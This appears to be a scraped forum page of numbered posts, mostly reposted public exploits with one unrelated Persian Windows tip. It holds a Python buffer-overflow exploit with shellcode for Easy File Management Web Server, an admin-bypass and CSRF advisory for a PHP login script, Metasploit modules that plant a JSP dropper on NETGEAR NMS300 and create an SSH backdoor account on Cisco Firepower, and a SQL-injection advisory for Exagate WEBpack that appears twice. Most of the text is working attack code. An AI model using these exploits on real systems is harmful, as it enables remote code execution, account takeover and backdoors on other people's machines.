  7. #!/usr/bin/python # Exploit Title: Easy File Management Web Server v5.6 - USERID Remote Buffer Overflow # Version: 5.6 # Date: 2015-08-17 # Author: Tracy Turben (tracyturben@gmail.com) # Software Link: http://www.efssoft.com/ # Tested on: Win7x32-EN # Special Thanks To: Julien Ahrens for the crafted jmp esp Trick ;) # Credits for vulnerability discovery: # superkojiman (http://www.exploit-db.com/exploits/33453/) from struct import pack import socket,sys import os host="192.168.1.15" port=80 junk0 = "\x90" * 80 # 0x1001d89b : {pivot 604 / 0x25c} # POP EDI # POP ESI # POP EBP # POP EBX # ADD ESP,24C # RETN [ImageLoad.dll] # The memory located at 0x1001D8F0: "\x7A\xD8\x01\x10" does the job! # Due to call dword ptr [edx+28h]: 0x1001D8F0 - 28h = 0x1001D8C8 call_edx=pack('<L',0x1001D8C8) junk1="\x90" * 280 ppr=pack('<L',0x10010101) # POP EBX # POP ECX # RETN [ImageLoad.dll] # Since 0x00 would break the exploit needs to be crafted on the stack crafted_jmp_esp=pack('<L',0xA44162FB) test_bl=pack('<L',0x10010125) # contains 00000000 to pass the JNZ instruction kungfu=pack('<L',0x10022aac) # MOV EAX,EBX # POP ESI # POP EBX # RETN [ImageLoad.dll] kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0xDEADBEEF) # filler kungfu+=pack('<L',0x1001a187) # ADD EAX,5BFFC883 # RETN [ImageLoad.dll] # finish crafting JMP ESP kungfu+=pack('<L',0x1002466d) # PUSH EAX # RETN [ImageLoad.dll] nopsled="\x90" * 20 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b '\x00\x0a\x0d' shellcode=("\xda\xca\xbb\xfd\x11\xa3\xae\xd9\x74\x24\xf4\x5a\x31\xc9" + "\xb1\x33\x31\x5a\x17\x83\xc2\x04\x03\xa7\x02\x41\x5b\xab" + "\xcd\x0c\xa4\x53\x0e\x6f\x2c\xb6\x3f\xbd\x4a\xb3\x12\x71" + "\x18\x91\x9e\xfa\x4c\x01\x14\x8e\x58\x26\x9d\x25\xbf\x09" + "\x1e\x88\x7f\xc5\xdc\x8a\x03\x17\x31\x6d\x3d\xd8\x44\x6c" + "\x7a\x04\xa6\x3c\xd3\x43\x15\xd1\x50\x11\xa6\xd0\xb6\x1e" + "\x96\xaa\xb3\xe0\x63\x01\xbd\x30\xdb\x1e\xf5\xa8\x57\x78" + "\x26\xc9\xb4\x9a\x1a\x80\xb1\x69\xe8\x13\x10\xa0\x11\x22" + "\x5c\x6f\x2c\x8b\x51\x71\x68\x2b\x8a\x04\x82\x48\x37\x1f" + "\x51\x33\xe3\xaa\x44\x93\x60\x0c\xad\x22\xa4\xcb\x26\x28" + "\x01\x9f\x61\x2c\x94\x4c\x1a\x48\x1d\x73\xcd\xd9\x65\x50" + "\xc9\x82\x3e\xf9\x48\x6e\x90\x06\x8a\xd6\x4d\xa3\xc0\xf4" + "\x9a\xd5\x8a\x92\x5d\x57\xb1\xdb\x5e\x67\xba\x4b\x37\x56" + "\x31\x04\x40\x67\x90\x61\xbe\x2d\xb9\xc3\x57\xe8\x2b\x56" + "\x3a\x0b\x86\x94\x43\x88\x23\x64\xb0\x90\x41\x61\xfc\x16" + "\xb9\x1b\x6d\xf3\xbd\x88\x8e\xd6\xdd\x4f\x1d\xba\x0f\xea" + "\xa5\x59\x50") payload=junk0 + call_edx + junk1 + ppr + crafted_jmp_esp + test_bl + kungfu + nopsled + shellcode buf="GET /vfolder.ghp HTTP/1.1\r\n" buf+="User-Agent: Mozilla/4.0\r\n" buf+="Host:" + host + ":" + str(port) + "\r\n" buf+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" buf+="Accept-Language: en-us\r\n" buf+="Accept-Encoding: gzip, deflate\r\n" buf+="Referer: http://" + host + "/\r\n" buf+="Cookie: SESSIONID=1337; UserID=" + payload + "; PassWD=;\r\n" buf+="Conection: Keep-Alive\r\n\r\n" print "[*] Connecting to Host " + host + "..." s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: connect=s.connect((host, port)) print "[*] Connected to " + host + "!" except: print "[!] " + host + " didn't respond\n" sys.exit(0) print "[*] Sending malformed request..." s.send(buf) print "[!] Exploit has been sent!\n" s.close()
  8. شیخ شاهین

    Trick-windows

    برنامهی Management Computer ویندوز، مجموعهای از ابزارهای مدیریتی است که اجازهی مدیریت یک رایانهی محلی یا از راه دور را به شما میدهد. جهت دسترسی به Computer Management راههای مختلفی وجود دارد. به ویژه در ویندوز 10 که تعدد این راهها بیشتر نیز شده است. در این ترفند به معرفی 7 راه مختلف جهت دسترسی به Management Computer در ویندوز 10 خواهیم پرداخت. 1 .از طریق منوی Start ابتدا بر روی دکمهی Start کلیک کنید تا منوی Start باز شود.
  9. Anonyali

    Hacking

    ----------------------------------------------------------------------------------- |<!-- # Exploit Title: User Login and Management PHP Script - multiple vulnerabilities # Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer # Dork: N/A # Date: 29.08.2017 # software link : https://www.codester.com/items/469/user-login-and-management-php-script # demo : http://froiden.cloudapp.net/LoginDashboard/index.php # Version: 3.04 # Category: Webapps # Tested on: windows64bit / mozila firefox # # |--!> |---------------------------------------------------------------------------------- 1) admin dashboard authentication bypass Description : An Attackers are able to completely compromise the web application built upon the user login and management php script as they can gain access to the admin panel and manage other users as an admin without authentication! Step 1: Create a rule in No-Redirect Add-on: ^http://localhost/LoginDashboard/admin/index.php Step 2: Access http://localhost/LoginDashboard/admin/dashboard.php Risk : Unauthenticated attackers are able to gain full access to the administrator panel and thus have total control over the application and users , including add admin user .. etc |---------------------------------------------------------------------------------- 2) account takeover - cross side request forgery Description : attacker can craft a malicious page and send it to any user who is already authenticated to change the password > exploitation < <html> <body> <form name="csrf_form" action="http://localhost/LoginDashboard/code/ajaxChangePassword.php?password=1234567890&cpassword=1234567890" method="POST"> <script type="text/javascript">document.csrf_form.submit();</script> </body> </html> |-----------------------------------------EOF-----------------------------------------
  10. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE def initialize(info = {}) super(update_info(info, 'Name' => 'NETGEAR ProSafe Network Management System 300 Arbitrary File Upload', 'Description' => %q{ Netgear's ProSafe NMS300 is a network management utility that runs on Windows systems. The application has a file upload vulnerability that can be exploited by an unauthenticated remote attacker to execute code as the SYSTEM user. Two servlets are vulnerable, FileUploadController (located at /lib-1.0/external/flash/fileUpload.do) and FileUpload2Controller (located at /fileUpload.do). This module exploits the latter, and has been tested with versions 1.5.0.2, 1.4.0.17 and 1.1.0.13. }, 'Author' => [ 'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and updated MSF module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2016-1525'], ['US-CERT-VU', '777024'], ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/netgear_nms_rce.txt'], ['URL', 'http://seclists.org/fulldisclosure/2016/Feb/30'] ], 'DefaultOptions' => { 'WfsDelay' => 5 }, 'Platform' => 'win', 'Arch' => ARCH_X86, 'Privileged' => true, 'Targets' => [ [ 'NETGEAR ProSafe Network Management System 300 / Windows', {} ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Feb 4 2016')) register_options( [ Opt::RPORT(8080), OptString.new('TARGETURI', [true, "Application path", '/']) ], self.class) end def check res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'GET' }) if res && res.code == 405 Exploit::CheckCode::Detected else Exploit::CheckCode::Safe end end def generate_jsp_payload exe = generate_payload_exe base64_exe = Rex::Text.encode_base64(exe) payload_name = rand_text_alpha(rand(6)+3) var_raw = 'a' + rand_text_alpha(rand(8) + 3) var_ostream = 'b' + rand_text_alpha(rand(8) + 3) var_buf = 'c' + rand_text_alpha(rand(8) + 3) var_decoder = 'd' + rand_text_alpha(rand(8) + 3) var_tmp = 'e' + rand_text_alpha(rand(8) + 3) var_path = 'f' + rand_text_alpha(rand(8) + 3) var_proc2 = 'e' + rand_text_alpha(rand(8) + 3) jsp = %Q| <%@page import="java.io.*"%> <%@page import="sun.misc.BASE64Decoder"%> <% try { String #{var_buf} = "#{base64_exe}"; BASE64Decoder #{var_decoder} = new BASE64Decoder(); byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString()); File #{var_tmp} = File.createTempFile("#{payload_name}", ".exe"); String #{var_path} = #{var_tmp}.getAbsolutePath(); BufferedOutputStream #{var_ostream} = new BufferedOutputStream(new FileOutputStream(#{var_path})); #{var_ostream}.write(#{var_raw}); #{var_ostream}.close(); Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path}); } catch (Exception e) { } %> | jsp.gsub!(/[\n\t\r]/, '') return jsp end def exploit jsp_payload = generate_jsp_payload jsp_name = Rex::Text.rand_text_alpha(8+rand(8)) jsp_full_name = "null#{jsp_name}.jsp" post_data = Rex::MIME::Message.new post_data.add_part(jsp_name, nil, nil, 'form-data; name="name"') post_data.add_part(jsp_payload, "application/octet-stream", 'binary', "form-data; name=\"Filedata\"; filename=\"#{Rex::Text.rand_text_alpha(6+rand(10))}.jsp\"") data = post_data.to_s print_status("#{peer} - Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], 'fileUpload.do'), 'method' => 'POST', 'data' => data, 'ctype' => "multipart/form-data; boundary=#{post_data.bound}" }) if res && res.code == 200 && res.body.to_s =~ /{"success":true, "file":"#{jsp_name}.jsp"}/ print_status("#{peer} - Payload uploaded successfully") else fail_with(Failure::Unknown, "#{peer} - Payload upload failed") end print_status("#{peer} - Executing payload...") send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], jsp_full_name), 'method' => 'GET' }) handler end end
  11. Document Title: ================ Exagate WEBpack Management System Multiple Vulnerabilities Author: ======== Halil Dalabasmaz Release Date: ============== 07 OCT 2016 Product & Service Introduction: ================================ WEBPack is the individual built-in user-friendly and skilled web interface allowing web-based access to the main units of the SYSGuard and POWERGuard series. The advanced software enables the users to design their customized dashboard smoothly for a detailed monitoring and management of all the power outlet sockets & sensor and volt free contact ports, as well as relay outputs. User definition and authorization, remote access and update, detailed reporting and archiving are among the many features. Vendor Homepage: ================= http://www.exagate.com/ Vulnerability Information: =========================== Exagate company uses WEBPack Management System software on the hardware. The software is web-based and it is provide control on the hardware. There are multiple vulnerabilities on that software. Vulnerability #1: SQL Injection ================================ There is no any filtering or validation mechanisim on "login.php". "username" and "password" inputs are vulnerable to SQL Injection attacks. Sample POST request is given below. POST /login.php HTTP/1.1 Host: <TARGET HOST> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 37 username=root&password=' or 1=1-- Vulnerability #2: Unauthorized Access To Sensetive Information =============================================================== The software is capable of sending e-mail to system admins. But there is no any authorization mechanism to access e-mail logs. The e-mail logs can accessable anonymously from "http://<TARGET HOST>/emaillog.txt". Vulnerability #3: Unremoved Configuration Files ================================================ The software contains the PHP Info file on the following URL. http://<TARGET HOST>/api/phpinfo.php Vulnerability Disclosure Timeline: ================================== 03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities 06 OCT 2016 - No response from vendor and re-attempted to contact vendor 07 OCT 2016 - No response from vendor 07 OCT 2016 - Public Disclosure Discovery Status: ================== Published Affected Product(s): ===================== Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities) Tested On: =========== Exagate SYSGuard 3001 Disclaimer & Information: ========================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bgasecurity.com Social: twitter.com/bgasecurity Contact: advisory@bga.com.tr Copyright © 2016 | BGA Security LLC
  12. Document Title: ================ Exagate WEBpack Management System Multiple Vulnerabilities Author: ======== Halil Dalabasmaz Release Date: ============== 07 OCT 2016 Product & Service Introduction: ================================ WEBPack is the individual built-in user-friendly and skilled web interface allowing web-based access to the main units of the SYSGuard and POWERGuard series. The advanced software enables the users to design their customized dashboard smoothly for a detailed monitoring and management of all the power outlet sockets & sensor and volt free contact ports, as well as relay outputs. User definition and authorization, remote access and update, detailed reporting and archiving are among the many features. Vendor Homepage: ================= http://www.exagate.com/ Vulnerability Information: =========================== Exagate company uses WEBPack Management System software on the hardware. The software is web-based and it is provide control on the hardware. There are multiple vulnerabilities on that software. Vulnerability #1: SQL Injection ================================ There is no any filtering or validation mechanisim on "login.php". "username" and "password" inputs are vulnerable to SQL Injection attacks. Sample POST request is given below. POST /login.php HTTP/1.1 Host: <TARGET HOST> User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:49.0) Gecko/20100101 Firefox/49.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 37 username=root&password=' or 1=1-- Vulnerability #2: Unauthorized Access To Sensetive Information =============================================================== The software is capable of sending e-mail to system admins. But there is no any authorization mechanism to access e-mail logs. The e-mail logs can accessable anonymously from "http://<TARGET HOST>/emaillog.txt". Vulnerability #3: Unremoved Configuration Files ================================================ The software contains the PHP Info file on the following URL. http://<TARGET HOST>/api/phpinfo.php Vulnerability Disclosure Timeline: ================================== 03 OCT 2016 - Attempted to contact vendor after discovery of vulnerabilities 06 OCT 2016 - No response from vendor and re-attempted to contact vendor 07 OCT 2016 - No response from vendor 07 OCT 2016 - Public Disclosure Discovery Status: ================== Published Affected Product(s): ===================== Exagate SYSGuard 3001 (Most probably all Exagate hardwares affected that vulnerabilities) Tested On: =========== Exagate SYSGuard 3001 Disclaimer & Information: ========================== The information provided in this advisory is provided as it is without any warranty. BGA disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. BGA or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages. Domain: www.bgasecurity.com Social: twitter.com/bgasecurity Contact: advisory@bga.com.tr Copyright © 2016 | BGA Security LLC
  13. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager include Msf::Exploit::Remote::SSH def initialize(info={}) super(update_info(info, 'Name' => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability", 'Description' => %q{ This module exploits a vulnerability found in Cisco Firepower Management Console. The management system contains a configuration flaw that allows the www user to execute the useradd binary, which can be abused to create backdoor accounts. Authentication is required to exploit this vulnerability. }, 'License' => MSF_LICENSE, 'Author' => [ 'Matt', # Original discovery & PoC 'sinn3r' # Metasploit module ], 'References' => [ [ 'CVE', '2016-6433' ], [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ] ], 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Targets' => [ [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ] ], 'Privileged' => false, 'DisclosureDate' => 'Oct 10 2016', 'CmdStagerFlavor'=> %w{ echo }, 'DefaultOptions' => { 'SSL' => 'true', 'SSLVersion' => 'Auto', 'RPORT' => 443 }, 'DefaultTarget' => 0)) register_options( [ # admin:Admin123 is the default credential for 6.0.1 OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']), OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']), OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']), OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']), OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']), OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22]) ], self.class) end def check # For this exploit to work, we need to check two services: # * HTTP - To create the backdoor account for SSH # * SSH - To execute our payload vprint_status('Checking Cisco Firepower Management console...') res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213') }) if res && res.code == 200 vprint_status("Console is found.") vprint_status("Checking SSH service.") begin ::Timeout.timeout(datastore['SSH_TIMEOUT']) do Net::SSH.start(rhost, 'admin', port: datastore['SSHPORT'], password: Rex::Text.rand_text_alpha(5), auth_methods: ['password'], non_interactive: true ) end rescue Timeout::Error vprint_error('The SSH connection timed out.') return Exploit::CheckCode::Unknown rescue Net::SSH::AuthenticationFailed # Hey, it talked. So that means SSH is running. return Exploit::CheckCode::Appears rescue Net::SSH::Exception => e vprint_error(e.message) end end Exploit::CheckCode::Safe end def get_sf_action_id(sid) requirements = {} print_status('Attempting to obtain sf_action_id from rulesimport.cgi') uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') res = send_request_cgi({ 'method' => 'GET', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}" }) unless res fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.') end sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1] unless sf_action_id fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi') end sf_action_id end def create_ssh_backdoor(sid, user, pass) uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi') sf_action_id = get_sf_action_id(sid) sh_name = 'exploit.sh' print_status("Attempting to create an SSH backdoor as #{user}:#{pass}") mime_data = Rex::MIME::Message.new mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"') mime_data.add_part('file', nil, nil, 'form-data; name="source"') mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"') mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"') mime_data.add_part( "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}", 'application/octet-stream', nil, "form-data; name=\"file\"; filename=\"#{sh_name}\"" ) send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'cookie' => "CGISESSID=#{sid}", 'ctype' => "multipart/form-data; boundary=#{mime_data.bound}", 'data' => mime_data.to_s, 'vars_get' => { 'no_mojo' => '1' }, }) end def generate_new_username datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5) end def generate_new_password datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5) end def report_cred(opts) service_data = { address: rhost, port: rport, service_name: 'cisco', protocol: 'tcp', workspace_id: myworkspace_id } credential_data = { origin_type: :service, module_fullname: fullname, username: opts[:user], private_data: opts[:password], private_type: :password }.merge(service_data) login_data = { last_attempted_at: DateTime.now, core: create_credential(credential_data), status: Metasploit::Model::Login::Status::SUCCESSFUL, proof: opts[:proof] }.merge(service_data) create_credential_login(login_data) end def do_login console_user = datastore['USERNAME'] console_pass = datastore['PASSWORD'] uri = normalize_uri(target_uri.path, 'login.cgi') print_status("Attempting to login in as #{console_user}:#{console_pass}") res = send_request_cgi({ 'method' => 'POST', 'uri' => uri, 'vars_post' => { 'username' => console_user, 'password' => console_pass, 'target' => '' } }) unless res fail_with(Failure::Unknown, 'Connection timed out while trying to log in.') end res_cookie = res.get_cookies if res.code == 302 && res_cookie.include?('CGISESSID') cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first print_status("CGI Session ID: #{cgi_sid}") print_good("Authenticated as #{console_user}:#{console_pass}") report_cred(username: console_user, password: console_pass) return cgi_sid end nil end def execute_command(cmd, opts = {}) @first_exec = true cmd.gsub!(/\/tmp/, '/usr/tmp') # Weird hack for the cmd stager. # Because it keeps using > to write the payload. if @first_exec @first_exec = false else cmd.gsub!(/>>/, ' > ') end begin Timeout.timeout(3) do @ssh_socket.exec!("#{cmd}\n") vprint_status("Executing #{cmd}") end rescue Timeout::Error fail_with(Failure::Unknown, 'SSH command timed out') rescue Net::SSH::ChannelOpenFailed print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)') retry end end def init_ssh_session(user, pass) print_status("Attempting to log into SSH as #{user}:#{pass}") factory = ssh_socket_factory opts = { auth_methods: ['password', 'keyboard-interactive'], port: datastore['SSHPORT'], use_agent: false, config: false, password: pass, proxy: factory, non_interactive: true } opts.merge!(verbose: :debug) if datastore['SSH_DEBUG'] begin ssh = nil ::Timeout.timeout(datastore['SSH_TIMEOUT']) do @ssh_socket = Net::SSH.start(rhost, user, opts) end rescue Net::SSH::Exception => e fail_with(Failure::Unknown, e.message) end end def exploit # To exploit the useradd vuln, we need to login first. sid = do_login return unless sid # After login, we can call the useradd utility to create a backdoor user new_user = generate_new_username new_pass = generate_new_password create_ssh_backdoor(sid, new_user, new_pass) # Log into the SSH backdoor account init_ssh_session(new_user, new_pass) begin execute_cmdstager({:linemax => 500}) ensure @ssh_socket.close end end end